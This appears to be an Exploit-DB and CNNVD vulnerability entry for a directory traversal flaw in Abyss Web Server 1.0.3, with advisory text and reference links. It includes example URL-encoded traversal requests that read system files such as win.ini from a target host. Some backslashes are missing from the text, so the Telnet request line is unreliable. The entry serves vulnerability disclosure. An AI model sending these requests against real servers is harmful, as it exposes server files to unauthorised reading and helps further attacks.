https://www.exploit-db.com/exploits/21735
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-009

AbyssWebServer1.0.3版本存在目录遍历漏洞。远程攻击者借助HTTPGET请求的..(点点反斜杠)序列读取任意文件。

source: http://www.securityfocus.com/bid/5547/info

A directory traversal vulnerability has been reported for Abyss Web Server. The issue is related to the failure to properly process the backslash '', encoded as '%5c', character, which may be used as a directory delimiter under these platforms. By using the URL encoded sequence '%2e%2e%5c', the web root may be escaped.

Exploitation can result in arbitrary system files being sent to a remote attacker. This information may be of value in attempting further attacks against the vulnerable system.

This issue is reported to have different effects in a different environments.

http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /..........winntwin.ini HTTP/1.0" (using a Telnet client)
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/
http://host/%2f%2e%2e%2f
http://host/%2f%2e%2e%2fcgi-bin/

来源:XF
名称:abyss-get-directory-traversal(9941)
链接:http://www.iss.net/security_center/static/9941.php
来源:XF
名称:abyss-http-directory-traversal(9940)
链接:http://www.iss.net/security_center/static/9940.php
来源:www.aprelium.com
链接:http://www.aprelium.com/news/patch1033.html
来源:BID
名称:5547
链接:http://www.securityfocus.com/bid/5547
来源:OSVDB
名称:3285
链接:http://www.osvdb.org/3285
来源:BUGTRAQ
名称:20020822Abyss1.0.3directorytraversalandadministrationbugs
链接:http://archives.neohapsis.com/archives/bugtraq/2002-08/0229.html